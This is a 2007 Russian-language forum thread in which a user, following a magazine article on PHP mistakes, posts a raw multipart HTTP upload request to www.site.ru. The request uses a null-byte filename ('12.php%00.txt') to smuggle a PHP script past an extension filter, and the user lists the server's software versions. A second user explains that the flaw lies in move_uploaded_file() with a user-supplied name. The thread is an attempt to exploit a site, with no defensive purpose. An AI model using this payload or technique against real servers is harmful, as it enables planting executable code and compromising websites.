статья "роковые ошыбки php" за октябрь
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
статья "роковые ошыбки php" за октябрь - 2007-10-31 03:23:37.963333
|
|
|
charli
Сообщений: 50
Оценки: 0
Присоединился: 2007-03-21 22:06:32.833333
|
купил журнал почетал эту статейку решыл проверить нифига не получается пробовал аплоад файлов как в статье нифига отсылаю
POST http://www.site.ru/test.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.site.ru/test.php
Accept-Language: en-us
Content-Type: multipart/form-data; boundary=---------------------------7d78c3170462
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; Opera 7.2; Windows NT 5.1; SV1)
Host: www.site.ru
Content-Length: 222
Pragma: no-cache
-----------------------------7d78c3170462
Content-Disposition: form-data; name="userfile"; filename="C:\12.php%00.txt"
Content-Type: application/octet-stream
test89091608094
-----------------------------7d78c3170462--
по статье фыйл должен закачатся как 12.php а получается 12.php%00.txt инфа о серваке safe_mode: OFF Apache/1.3.37 (Unix) PHP/4.4.4 FrontPage/3.0.4.2 mod_perl/1.26 AuthMySQL/2.20
|
|
|
RE: статья "роковые ошыбки php" за октябрь - 2007-11-02 21:21:55.866666
|
|
|
Helios
Сообщений: 48
Оценки: 0
Присоединился: 2005-06-16 20:10:53
|
дырка не при загрузке, а при выполнении move_uploaded_file(), когда перемещаешь файл из /tmp в нужное место под именем, которое было получено от пользователя.
|
|
|
RE: статья "роковые ошыбки php" за октябрь - 2007-11-05 09:16:54.220000
|
|
|
charli
Сообщений: 50
Оценки: 0
Присоединился: 2007-03-21 22:06:32.833333
|
а что я тогда неправельно делал ? я же передаю имя файла как 12.php%00.txt поидее должно записатся как 12.php и вообще в каких сучаях эта бага будет работать ?
|
|
|
|
|